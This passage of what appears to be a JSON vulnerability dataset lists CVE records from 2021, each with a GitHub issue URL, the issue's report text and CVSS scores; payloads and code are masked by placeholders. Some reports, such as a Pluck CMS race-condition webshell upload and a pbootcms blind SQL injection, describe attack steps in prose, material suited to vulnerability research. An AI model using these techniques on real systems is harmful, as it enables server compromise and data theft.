  64463. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  64464. "severity": "HIGH",
  64465. "baseScore": 7.5,
  64466. "impactScore": 3.6,
  64467. "exploitabilityScore": 3.9
  64468. },
  64469. {
  64470. "CVE_ID": "CVE-2021-27973",
  64471. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1352",
  64472. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1352",
  64473. "Repo_new": "piwigo/piwigo",
  64474. "Issue_Created_At": "2021-03-01T11:44:16Z",
  64475. "description": "SQL injection in settings language in version NUMBERTAG Login with admin or users can set the language NUMBERTAG Send the following payload and follow redirect: db user : URLTAG FILETAG db version: URLTAG FILETAG",
  64476. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  64477. "severity": "HIGH",
  64478. "baseScore": 7.2,
  64479. "impactScore": 5.9,
  64480. "exploitabilityScore": 1.2
  64481. },
  64482. {
  64483. "CVE_ID": "CVE-2021-27983",
  64484. "Issue_Url_old": "https://github.com/maxsite/cms/issues/430",
  64485. "Issue_Url_new": "https://github.com/maxsite/cms/issues/430",
  64486. "Repo_new": "maxsite/cms",
  64487. "Issue_Created_At": "2021-03-02T02:16:46Z",
  64488. "description": "Remote Code Execution Vulnerability In APITAG CMS NUMBERTAG After the administrator logged in, open the APITAG page. Select any of the files, change the contents to poc and save. poc\uff1a APITAG FILETAG Open the APITAG page and the code has been executed. FILETAG From: EMAILTAG",
  64489. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64490. "severity": "CRITICAL",
  64491. "baseScore": 9.8,
  64492. "impactScore": 5.9,
  64493. "exploitabilityScore": 3.9
  64494. },
  64495. {
  64496. "CVE_ID": "CVE-2021-27984",
  64497. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/98",
  64498. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/98",
  64499. "Repo_new": "pluck-cms/pluck",
  64500. "Issue_Created_At": "2021-03-03T16:03:21Z",
  64501. "description": "Pluck NUMBERTAG admin background exists a remote command execution vulnerability when uploading files. I uploaded any file in the \"manage files\" section, here I uploaded a NUMBERTAG jpg\". FILETAG Found two files at the upload folder. FILETAG Looked at the source code for the delete file function. On lines NUMBERTAG and NUMBERTAG of PATHTAG the logic is that the file \".htaccess\" is not allowed to be deleted. But it can be bypassed. FILETAG I clicked on the delete button on the page for NUMBERTAG jpg\" and sniffered the packet. FILETAG Change the value of the request parameter \"var\" to APITAG (the suffix name is not case sensitive in Windows) FILETAG APITAG is already in the trash. FILETAG The \".htaccess\" in the upload folder has been copied to the trash folder. FILETAG Looked at the source code for the upload function, lines NUMBERTAG to NUMBERTAG of PATHTAG FILETAG The code logic is as follows NUMBERTAG First check if the file suffix is \".htaccess NUMBERTAG then check if the file suffix is in the blacklist NUMBERTAG If the suffix is in the blacklist, add the suffix \".txt\" for renaming and give permission NUMBERTAG If the suffix name is not in the blacklist, then give permission directly. Use race condition for attacks. First I create a APITAG file. poc: APITAG FILETAG Upload the file and sniffer a packet of the upload request and send it to intruder (add variable a NUMBERTAG to keep sniffering the request packet). FILETAG Then sniffer a packet that accesses the file and send it to intruder. FILETAG Both intruder types are selected as APITAG and the number is NUMBERTAG FILETAG Threads are set to NUMBERTAG FILETAG Start the attack, when the status of the request to access the file is NUMBERTAG it means that the file was uploaded successfully and the code was executed. FILETAG FILETAG Upload webshell with race condition and successfully gain access to the server. exploit\uff1a FILETAG FILETAG APITAG the \".php\" file only exists when the race condition is in place, if the race condition is stopped the \".php\" file will still be a \". APITAG file, so the shell will disconnect. The shell will then disconnect. (So maintaining permissions requires that race condition be maintained at all times) From: EMAILTAG",
  64502. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64503. "severity": "HIGH",
  64504. "baseScore": 8.1,
  64505. "impactScore": 5.9,
  64506. "exploitabilityScore": 2.2
  64507. },
  64508. {
  64509. "CVE_ID": "CVE-2021-28021",
  64510. "Issue_Url_old": "https://github.com/nothings/stb/issues/1108",
  64511. "Issue_Url_new": "https://github.com/nothings/stb/issues/1108",
  64512. "Repo_new": "nothings/stb",
  64513. "Issue_Created_At": "2021-03-04T10:19:50Z",
  64514. "description": "heap overflow in APITAG heap overflow by a craft jpeg file in APITAG poc FILETAG asan report: ERRORTAG",
  64515. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  64516. "severity": "HIGH",
  64517. "baseScore": 7.8,
  64518. "impactScore": 5.9,
  64519. "exploitabilityScore": 1.8
  64520. },
  64521. {
  64522. "CVE_ID": "CVE-2021-28040",
  64523. "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1953",
  64524. "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1953",
  64525. "Repo_new": "ossec/ossec-hids",
  64526. "Issue_Created_At": "2021-02-23T14:37:16Z",
  64527. "description": "os_xml APITAG Uncontrolled recursion vulnerability leading to APITAG (SIGSEGV). os_xml APITAG Uncontrolled recursion vulnerability INTRODUCTION An Uncontrolled Recursion vulnerability has been identified in the APITAG XML parsing library used by OSSEC. Through the APITAG code, a flaw has been identified in APITAG that allows non defined recursion cycles, thus finally trying to access non mapped memory once the stack end has been reached. The payload consists on a number of APITAG which will trigger the recursion and finally ending it with APITAG . REPRODUCE To reproduce this vulnerability, compile the APITAG and open the payload file with it. CODETAG If we compile APITAG with ASAN APITAG this is the output we are given: ERRORTAG As we can see an unlimited number of recursion calls can be performed, ending on a SIGSEGV APITAG fault). Attention! : If a SIGSEGV is not triggered, try adding more APITAG in the payload. The segmentation fault error is because we reach the end of the stack, so it depends on the offset until the end of it, which may differ in your situation. ANALYSIS There exists a non limited recursion in the APITAG function: ERRORTAG If we debug it after specifying the crash file as argument: ERRORTAG A SIGSEGV APITAG fault) happens when trying to access invalid memory as the rsp register contains an address that is not mapped. IMPACT The most common issue with this type of vulnerability is a Denial of Service APITAG once a crash has been triggered as demonstrated above with the crash APITAG SOLUTION The best solution to this vulnerability is implementing a code that controls the number of allowed recursions, or redesigning the methodology to loop over the XML tags using a while or for loop instead of recursing if the number of needed iterations is huge, resulting in a Stack exhaustion. The APITAG is performed due to the creation of a new frame in the stack for each new function being called. Creation of a big amount of frames results after a lot of iterations in consuming up the available stack memory, and once reached non mapped memory a segmentation fault interruption will happen. An important factor that decreases a lot the needed iterations to finally trigger the bug is the existence of three big stack buffers in the recursive function. Another useful change would be using dynamic memory with APITAG or APITAG when big amount of space is needed, also it can be reused instead of creating a chunk or stack buffer for each function call.",
  64528. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64529. "severity": "HIGH",
  64530. "baseScore": 7.5,
  64531. "impactScore": 3.6,
  64532. "exploitabilityScore": 3.9
  64533. },
  64534. {
  64535. "CVE_ID": "CVE-2021-28070",
  64536. "Issue_Url_old": "https://github.com/PopojiCMS/PopojiCMS/issues/31",
  64537. "Issue_Url_new": "https://github.com/popojicms/popojicms/issues/31",
  64538. "Repo_new": "popojicms/popojicms",
  64539. "Issue_Created_At": "2021-03-06T07:06:24Z",
  64540. "description": "I found a CSRF vulnerability to delete user. One: use CSRF vulnerability to delete user Vulnerability details: When the administrator logs in, opening the webpage will automatically delete the specified user. Vulnerability url: URLTAG Vulnerability POC: ERRORTAG",
  64541. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  64542. "severity": "MEDIUM",
  64543. "baseScore": 4.3,
  64544. "impactScore": 1.4,
  64545. "exploitabilityScore": 2.8
  64546. },
  64547. {
  64548. "CVE_ID": "CVE-2021-28099",
  64549. "Issue_Url_old": "https://github.com/Netflix/hollow/issues/502",
  64550. "Issue_Url_new": "https://github.com/netflix/hollow/issues/502",
  64551. "Repo_new": "netflix/hollow",
  64552. "Issue_Created_At": "2021-01-24T16:49:45Z",
  64553. "description": "Please open a security advisory. Hello Netflix Hollow Team, I'd like to report a potential security vulnerability in Netflix hollow. Please open a private security advisory so we can discuss the issue. URLTAG",
  64554. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
  64555. "severity": "MEDIUM",
  64556. "baseScore": 4.4,
  64557. "impactScore": 2.5,
  64558. "exploitabilityScore": 1.8
  64559. },
  64560. {
  64561. "CVE_ID": "CVE-2021-28119",
  64562. "Issue_Url_old": "https://github.com/xanderfrangos/twinkle-tray/issues/142",
  64563. "Issue_Url_new": "https://github.com/xanderfrangos/twinkle-tray/issues/142",
  64564. "Repo_new": "xanderfrangos/twinkle-tray",
  64565. "Issue_Created_At": "2021-03-09T16:37:44Z",
  64566. "description": "Potential command execution vulnerability introduced by unsafe IPC exposure. Hi, Great work! We did a security analysis on the app and found that the risky APITAG is directly exposed to the unsafe renderer process. This may allow remote attackers to abuse sensitive methods in the (privileged) main process by crafting malicious IPC messages. Vulnerability Details The following code shows how a preload script exposes IPC. URLTAG We do find exploitable IPC endpoints. e.g., If the attacker sends a malicious msg to APITAG channel, he may execute arbitrary commands via APITAG . URLTAG Mitigation enforce security checks when receiving events on sensitive channels (e.g., check if received URL is legal before APITAG avoid directly exposing APITAG to untrusted domains.",
  64567. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64568. "severity": "CRITICAL",
  64569. "baseScore": 9.8,
  64570. "impactScore": 5.9,
  64571. "exploitabilityScore": 3.9
  64572. },
  64573. {
  64574. "CVE_ID": "CVE-2021-28122",
  64575. "Issue_Url_old": "https://github.com/open5gs/open5gs/issues/837",
  64576. "Issue_Url_new": "https://github.com/open5gs/open5gs/issues/837",
  64577. "Repo_new": "open5gs/open5gs",
  64578. "Issue_Created_At": "2021-03-10T13:18:52Z",
  64579. "description": "Authentication Bypass in Webui. An unauthenticated user can utilize information provided by the login page of the webui component to craft HTTP requests that will allow that user to create, read, update, and delete entries in the subscriber database. This includes the ability to add administrative users, PATHTAG subscribers, and PATHTAG profiles. Properly crafted HTTP GET and DELETE requests with empty bodies will cause data to be returned or deleted on the following routes: URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG Properly crafted HTTP POST,PUT and PATCH requests with properly crafted bodies will cause data to be inserted or updated on the following routes: URLTAG URLTAG URLTAG URLTAG URLTAG URLTAG This is caused by the configuration of express js in FILETAG . This should be updated to correctly validate the user making the API calls.",
  64580. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64581. "severity": "CRITICAL",
  64582. "baseScore": 9.8,
  64583. "impactScore": 5.9,
  64584. "exploitabilityScore": 3.9
  64585. },
  64586. {
  64587. "CVE_ID": "CVE-2021-28128",
  64588. "Issue_Url_old": "https://github.com/strapi/strapi/issues/9657",
  64589. "Issue_Url_new": "https://github.com/strapi/strapi/issues/9657",
  64590. "Repo_new": "strapi/strapi",
  64591. "Issue_Created_At": "2021-03-09T17:43:20Z",
  64592. "description": "Ask for password . Feature request Make every \"update user password\" process in the Admin panel safer by asking to confirm the currently active password Please describe your feature request [ ] I have created my request on the Product Board before I submitted this issue [x] I have looked at all the other requests on the Product Board before I submitted this issue Summary It is currently possible to update a user's password without having to confirm their currently active password. A general improvement would be to ask for some current active password confirmation (at least the one of the user asking for a change) before processing the update. Why is it needed? The user password update process should be more committing to prevent unmeant or malicious changing actions. Suggested solution(s) Ask for a current password confirmation before updating a user's password through the admin panel Related issue(s)/PR(s)",
  64593. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  64594. "severity": "HIGH",
  64595. "baseScore": 8.1,
  64596. "impactScore": 5.2,
  64597. "exploitabilityScore": 2.8
  64598. },
  64599. {
  64600. "CVE_ID": "CVE-2021-28134",
  64601. "Issue_Url_old": "https://github.com/AkashRajpurohit/clipper/issues/13",
  64602. "Issue_Url_new": "https://github.com/akashrajpurohit/clipper/issues/13",
  64603. "Repo_new": "akashrajpurohit/clipper",
  64604. "Issue_Created_At": "2021-03-09T01:33:30Z",
  64605. "description": "Potential Command Execution vulnerabilities introduced by FILETAG . Hi, We found that APITAG introduces dangerous API APITAG for arbitrary access on unsafe renderer process. This may lead to remote command execution. We suggest that a URL check should be enforced at L NUMBERTAG which enforces an allowlist on trusted urls. URLTAG",
  64606. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64607. "severity": "CRITICAL",
  64608. "baseScore": 9.8,
  64609. "impactScore": 5.9,
  64610. "exploitabilityScore": 3.9
  64611. },
  64612. {
  64613. "CVE_ID": "CVE-2021-28154",
  64614. "Issue_Url_old": "https://github.com/camunda/camunda-modeler/issues/2143",
  64615. "Issue_Url_new": "https://github.com/camunda/camunda-modeler/issues/2143",
  64616. "Repo_new": "camunda/camunda-modeler",
  64617. "Issue_Created_At": "2021-03-09T16:17:42Z",
  64618. "description": "Arbitrary filesystem manipulation vulnerability introduced by ipc exposure. APITAG the Bug__ Hi, We found that APITAG directly expose risky APITAG instance to unsafe renderer process, which enables a remote attacker to abuse sensitive methods in the main process by crafting malicious ipc message. I notice that the app has already disabled node integration in unsafe renderers( URLTAG which is good. However, such directly IPC export may re expose many sensitive primitives to the attacker. Here is the exposure site. URLTAG By sending a message to APITAG channel. The attacker may read and write malicious content to the user filesystem. URLTAG APITAG Behavior__ I could think of two possible solutions: enforce security checks when receiving events on sensitive channels (e.g., file read/write). avoid directly exposing APITAG to untrusted domains.",
  64619. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  64620. "severity": "CRITICAL",
  64621. "baseScore": 9.1,
  64622. "impactScore": 5.2,
  64623. "exploitabilityScore": 3.9
  64624. },
  64625. {
  64626. "CVE_ID": "CVE-2021-28161",
  64627. "Issue_Url_old": "https://github.com/eclipse-theia/theia/issues/8794",
  64628. "Issue_Url_new": "https://github.com/eclipse-theia/theia/issues/8794",
  64629. "Repo_new": "eclipse-theia/theia",
  64630. "Issue_Created_At": "2020-11-28T23:36:58Z",
  64631. "description": "XSS in Debug Console FILETAG (L NUMBERTAG FILETAG I think this issue is similar to NUMBERTAG Steps to Reproduce: See also the FILETAG . FILETAG Additional Information Theia Version: Theia NUMBERTAG Questions Theia is an important open source project, but it hasn't set a Github security policy. Should it have one?",
  64632. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  64633. "severity": "MEDIUM",
  64634. "baseScore": 6.1,
  64635. "impactScore": 2.7,
  64636. "exploitabilityScore": 2.8
  64637. },
  64638. {
  64639. "CVE_ID": "CVE-2021-28162",
  64640. "Issue_Url_old": "https://github.com/eclipse-theia/theia/issues/7283",
  64641. "Issue_Url_new": "https://github.com/eclipse-theia/theia/issues/7283",
  64642. "Repo_new": "eclipse-theia/theia",
  64643. "Issue_Created_At": "2020-03-05T15:45:25Z",
  64644. "description": "Javascript injection via notification messages. Description In the notification messages there is no an HTML escaping, so Javascript code can run. I'm not sure, but I think the issue is in PATHTAG URLTAG APITAG In Electron app an arbitrary JS code can lead to dangerous exploits. Reproduction Steps Create a new project and create a new debugger configuration file APITAG In the type field write the Javascript payload (e.g. APITAG ) Press F5 to launch the debugger and see the alert box FILETAG OS and Theia version: Ubuntu NUMBERTAG Theia Electron Example NUMBERTAG I think this bug is a vulnerability, I can exfiltrate data from victim's computer by using JS. Here a proof of concept video. FILETAG",
  64645. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  64646. "severity": "MEDIUM",
  64647. "baseScore": 6.1,
  64648. "impactScore": 2.7,
  64649. "exploitabilityScore": 2.8
  64650. },
  64651. {
  64652. "CVE_ID": "CVE-2021-28167",
  64653. "Issue_Url_old": "https://github.com/eclipse/openj9/issues/12016",
  64654. "Issue_Url_new": "https://github.com/eclipse-openj9/openj9/issues/12016",
  64655. "Repo_new": "eclipse-openj9/openj9",
  64656. "Issue_Created_At": "2021-02-21T22:28:06Z",
  64657. "description": "APITAG sometimes will be invoked after static method being invoked.. ERRORTAG Considering the test case below: ERRORTAG and the output is: ERRORTAG We will find that APITAG was invoked after APITAG being invoked. If we run it with hotspot, the result is: ERRORTAG",
  64658. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
  64659. "severity": "MEDIUM",
  64660. "baseScore": 6.5,
  64661. "impactScore": 2.5,
  64662. "exploitabilityScore": 3.9
  64663. },
  64664. {
  64665. "CVE_ID": "CVE-2021-28170",
  64666. "Issue_Url_old": "https://github.com/eclipse-ee4j/el-ri/issues/155",
  64667. "Issue_Url_new": "https://github.com/jakartaee/expression-language/issues/155",
  64668. "Repo_new": "jakartaee/expression-language",
  64669. "Issue_Created_At": "2021-04-14T18:51:51Z",
  64670. "description": "GHSL NUMBERTAG Bypass input sanitization of EL expressions . Github posted this publicly about NUMBERTAG weeks ago URLTAG",
  64671. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  64672. "severity": "MEDIUM",
  64673. "baseScore": 5.3,
  64674. "impactScore": 1.4,
  64675. "exploitabilityScore": 3.9
  64676. },
  64677. {
  64678. "CVE_ID": "CVE-2021-28233",
  64679. "Issue_Url_old": "https://github.com/brackeen/ok-file-formats/issues/11",
  64680. "Issue_Url_new": "https://github.com/brackeen/ok-file-formats/issues/11",
  64681. "Repo_new": "brackeen/ok-file-formats",
  64682. "Issue_Created_At": "2021-03-05T13:29:01Z",
  64683. "description": "heap buffer overflow in function APITAG at APITAG Version dev version, git clone FILETAG Environment Ubuntu NUMBERTAG bit Testcase CODETAG Command APITAG Result APITAG Although the results of the running are correct, when I used our vulnerability detection tool to detect, I found that a heap buffer overflow occurred in line NUMBERTAG Looking Description for detailed description. Description When I used gdb for debugging with the following command\uff1a APITAG Obtaining the start address and size of the decoder with the help of the above command\uff0cwhich explaining that the valid address range of the decoder is in FILETAG .",
  64684. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  64685. "severity": "HIGH",
  64686. "baseScore": 8.8,
  64687. "impactScore": 5.9,
  64688. "exploitabilityScore": 2.8
  64689. },
  64690. {
  64691. "CVE_ID": "CVE-2021-28236",
  64692. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/324",
  64693. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/324",
  64694. "Repo_new": "libredwg/libredwg",
  64695. "Issue_Created_At": "2021-03-03T09:19:26Z",
  64696. "description": "Four NULL dereference in out_dxfb.c. I found four NULL dereference bugs in the current master NUMBERTAG d2c NUMBERTAG f). Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure bug NUMBERTAG in APITAG Command APITAG ASAN report ERRORTAG bug NUMBERTAG in APITAG Command APITAG ASAN report ERRORTAG bug NUMBERTAG in APITAG Command APITAG ASAN report ERRORTAG",
  64697. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64698. "severity": "HIGH",
  64699. "baseScore": 7.5,
  64700. "impactScore": 3.6,
  64701. "exploitabilityScore": 3.9
  64702. },
  64703. {
  64704. "CVE_ID": "CVE-2021-28237",
  64705. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/325",
  64706. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/325",
  64707. "Repo_new": "libredwg/libredwg",
  64708. "Issue_Created_At": "2021-03-04T04:20:26Z",
  64709. "description": "Heap buffer overflow in APITAG I found a heap buffer overflow in the current master NUMBERTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command APITAG ASAN report ERRORTAG POC FILETAG",
  64710. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64711. "severity": "CRITICAL",
  64712. "baseScore": 9.8,
  64713. "impactScore": 5.9,
  64714. "exploitabilityScore": 3.9
  64715. },
  64716. {
  64717. "CVE_ID": "CVE-2021-28242",
  64718. "Issue_Url_old": "https://github.com/b2evolution/b2evolution/issues/109",
  64719. "Issue_Url_new": "https://github.com/b2evolution/b2evolution/issues/109",
  64720. "Repo_new": "b2evolution/b2evolution",
  64721. "Issue_Created_At": "2021-02-26T10:12:06Z",
  64722. "description": "Responsible Disclosure Security Issue. Hi Team, We have identified a Critical security issue and we would like to report back to you since it is supposed to fixed ASAP . We tried to contact you via the b2evolution forum. Since there was no response just trying to reach you via all mode. Kindly help us with your mail id so we can report it directly to the correct person as part of responsible disclosure.",
  64723. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  64724. "severity": "HIGH",
  64725. "baseScore": 8.8,
  64726. "impactScore": 5.9,
  64727. "exploitabilityScore": 2.8
  64728. },
  64729. {
  64730. "CVE_ID": "CVE-2021-28245",
  64731. "Issue_Url_old": "https://github.com/M40k1n9/vulner/issues/1",
  64732. "Issue_Url_new": "https://github.com/m40k1n9/vulner/issues/1",
  64733. "Repo_new": "m40k1n9/vulner",
  64734. "Issue_Created_At": "2021-03-09T07:34:55Z",
  64735. "description": "pbootcms. APITAG NUMBERTAG has SQL injection Vulnerability Type : SQL Injection Vulnerability Version NUMBERTAG Recurring environment: Windows NUMBERTAG PHP NUMBERTAG Apache NUMBERTAG Mysql NUMBERTAG ulnerability Description AND recurrence: The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database. the mysql database directory: PATHTAG image URLTAG Boolean based\u00a0blind\u00a0SQL\u00a0injection happened in this page. '$_ POST' sends an index array. The values in the array are brought into the \"where\" condition in the form of \"and\". image URLTAG When the condition is true: image URLTAG image URLTAG When the condition is false: image URLTAG image URLTAG payload: Because the data is filtered, only 'regexp' can be used for regular matching. image URLTAG image URLTAG and we can get the admin account name and password Detailed information NUMBERTAG ulnerability PATHTAG image URLTAG When the passed in parameter $where is an array, traverse the array, and when $where is an index APITAG APITAG the code to pass in the \u2018where\u2019 function as an index array: PATHTAG In APITAG the incoming data is assigned to the variable \"$receive\" for traversal, and \"$key\" is brought into APITAG for filtering. image URLTAG image URLTAG image URLTAG image URLTAG image URLTAG image URLTAG image URLTAG image URLTAG image URLTAG The values of the index array passed in through the above methods can only contain Chinese, letters, numbers, horizontal lines, dots, commas and spaces! It is encoded by APITAG and APITAG Finally, it is passed to '$where3'. image URLTAG image URLTAG image URLTAG The '$where3' in APITAG is controllable, and it will be brought into the statement in the form of 'and'.",
  64736. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  64737. "severity": "HIGH",
  64738. "baseScore": 7.5,
  64739. "impactScore": 3.6,
  64740. "exploitabilityScore": 3.9
  64741. },
  64742. {
  64743. "CVE_ID": "CVE-2021-28275",
  64744. "Issue_Url_old": "https://github.com/Matthias-Wandel/jhead/issues/17",
  64745. "Issue_Url_new": "https://github.com/matthias-wandel/jhead/issues/17",
  64746. "Repo_new": "matthias-wandel/jhead",
  64747. "Issue_Created_At": "2021-02-26T08:09:28Z",
  64748. "description": "Multiple Segmentation fault in jhead via a crafted jpg file. Description of problem: Multiple Segmentation fault in jhead via a crafted jpg file Version Release number of selected component (if applicable): I tested the following version: Jhead version NUMBERTAG Jhead version NUMBERTAG How reproducible: git clone depth NUMBERTAG FILETAG && cd jhead && make CC=\"clang\" e CFLAGS=\" g fsanitize=address\" e LDFLAGS=\" g fsanitize=address\" Steps to Reproduce NUMBERTAG just run the following command Segmentation fault in APITAG APITAG Segmentation fault in Get NUMBERTAG u APITAG Segmentation fault in Get NUMBERTAG s APITAG poc\uff1a FILETAG They are all because of wild addr read. Actual results: Segmentation fault in APITAG ERRORTAG Segmentation fault in Get NUMBERTAG u ERRORTAG Segmentation fault in Get NUMBERTAG s ERRORTAG Additional info: Founder: giantbranch of NSFOCUS Security Team",
  64749. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  64750. "severity": "MEDIUM",
  64751. "baseScore": 5.5,
  64752. "impactScore": 3.6,
  64753. "exploitabilityScore": 1.8
  64754. },
  64755. {
  64756. "CVE_ID": "CVE-2021-28277",
  64757. "Issue_Url_old": "https://github.com/Matthias-Wandel/jhead/issues/16",
  64758. "Issue_Url_new": "https://github.com/matthias-wandel/jhead/issues/16",
  64759. "Repo_new": "matthias-wandel/jhead",
  64760. "Issue_Created_At": "2021-02-26T08:06:21Z",
  64761. "description": "A heap based buffer overflow Read in APITAG in jpgfile.c. Description of problem: A heap based buffer overflow Read in APITAG in jpgfile.c Version Release number of selected component (if applicable): I tested the following version: Jhead version NUMBERTAG Jhead version NUMBERTAG How reproducible: git clone depth NUMBERTAG FILETAG && cd jhead && make CC=\"clang\" e CFLAGS=\" g fsanitize=address\" e LDFLAGS=\" g fsanitize=address\" Steps to Reproduce NUMBERTAG just run the following command APITAG poc\uff1a FILETAG Actual results: APITAG Report ERRORTAG Additional info: Founder: giantbranch of NSFOCUS Security Team",
  64762. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  64763. "severity": "HIGH",
  64764. "baseScore": 7.8,
  64765. "impactScore": 5.9,
  64766. "exploitabilityScore": 1.8
  64767. },
  64768. {
  64769. "CVE_ID": "CVE-2021-28278",
  64770. "Issue_Url_old": "https://github.com/Matthias-Wandel/jhead/issues/15",
  64771. "Issue_Url_new": "https://github.com/matthias-wandel/jhead/issues/15",
  64772. "Repo_new": "matthias-wandel/jhead",
  64773. "Issue_Created_At": "2021-02-26T08:04:46Z",
  64774. "description": "A heap based buffer overflow Read in APITAG in jpgfile.c. Description of problem: A heap based buffer overflow Read in APITAG in jpgfile.c Version Release number of selected component (if applicable): I tested the following version: Jhead version NUMBERTAG Jhead version NUMBERTAG How reproducible: git clone depth NUMBERTAG FILETAG && cd jhead && make CC=\"clang\" e CFLAGS=\" g fsanitize=address\" e LDFLAGS=\" g fsanitize=address\" Steps to Reproduce NUMBERTAG just run the following command APITAG poc\uff1a FILETAG Actual results: APITAG Report ERRORTAG Additional info: Founder: giantbranch of NSFOCUS Security Team",
  64775. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  64776. "severity": "HIGH",
  64777. "baseScore": 7.8,
  64778. "impactScore": 5.9,
  64779. "exploitabilityScore": 1.8
  64780. },
  64781. {
  64782. "CVE_ID": "CVE-2021-28290",
  64783. "Issue_Url_old": "https://github.com/skoruba/IdentityServer4.Admin/issues/813",
  64784. "Issue_Url_new": "https://github.com/skoruba/identityserver4.admin/issues/813",
  64785. "Repo_new": "skoruba/identityserver4.admin",
  64786. "Issue_Created_At": "2021-03-11T17:17:35Z",
  64787. "description": "XSS issue in Client Secrets and Api Resource Secrets. In the views APITAG and APITAG is not HTML encoded data attribute APITAG on the button: APITAG This data attribute is used in the dialog with secret detail. Fix: CODETAG I will send this fix asap. Thanks to Silton Santos for reporting.",
  64788. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  64789. "severity": "MEDIUM",
  64790. "baseScore": 6.1,
  64791. "impactScore": 2.7,
  64792. "exploitabilityScore": 2.8
  64793. },
  64794. {
  64795. "CVE_ID": "CVE-2021-28300",
  64796. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1702",
  64797. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1702",
  64798. "Repo_new": "gpac/gpac",
  64799. "Issue_Created_At": "2021-03-11T02:05:00Z",
  64800. "description": "A NULL pointer dereference in the function APITAG in APITAG . Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG gdb info: CODETAG ASAN info: ERRORTAG",
  64801. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64802. "severity": "CRITICAL",
  64803. "baseScore": 9.8,
  64804. "impactScore": 5.9,
  64805. "exploitabilityScore": 3.9
  64806. },
  64807. {
  64808. "CVE_ID": "CVE-2021-28302",
  64809. "Issue_Url_old": "https://github.com/pupnp/pupnp/issues/249",
  64810. "Issue_Url_new": "https://github.com/pupnp/pupnp/issues/249",
  64811. "Repo_new": "pupnp/pupnp",
  64812. "Issue_Created_At": "2021-03-12T02:54:55Z",
  64813. "description": "Too many nested tags will lead to stack space exhaustion, resulting in signal NUMBERTAG SIGSEGV). hi, this poc caused a crash. When parsing xml, if there if too many \" APITAG \" in it ,that causes a crash. The problem is in the function APITAG \uff0c After parses all < a >, it can't find the closed node, and finally enters the errorhandler. When using APITAG When releases APITAG APITAG will release the child node APITAG recursively, which will consume stack space. If the recursive depth is not limited, it will cause crash. POC and crash are below. I suggest adding an interface that limits the depth of recursion. the stack size of my device $ulimit s NUMBERTAG poc: CODETAG android crash tombstone: Build fingerprint: PATHTAG format APITAG keys' Revision NUMBERTAG ABI: 'arm' Timestamp NUMBERTAG pid NUMBERTAG tid NUMBERTAG name: Thread NUMBERTAG APITAG <<< uid NUMBERTAG signal NUMBERTAG SIGSEGV), code NUMBERTAG SEGV_ACCERR), fault addr NUMBERTAG bd NUMBERTAG ff8 r0 b NUMBERTAG r NUMBERTAG bf1f r2 eca NUMBERTAG r NUMBERTAG a r4 b NUMBERTAG r NUMBERTAG c r NUMBERTAG r NUMBERTAG c r8 dbf NUMBERTAG c r9 dbf NUMBERTAG r NUMBERTAG a r NUMBERTAG dbf NUMBERTAG ip c NUMBERTAG 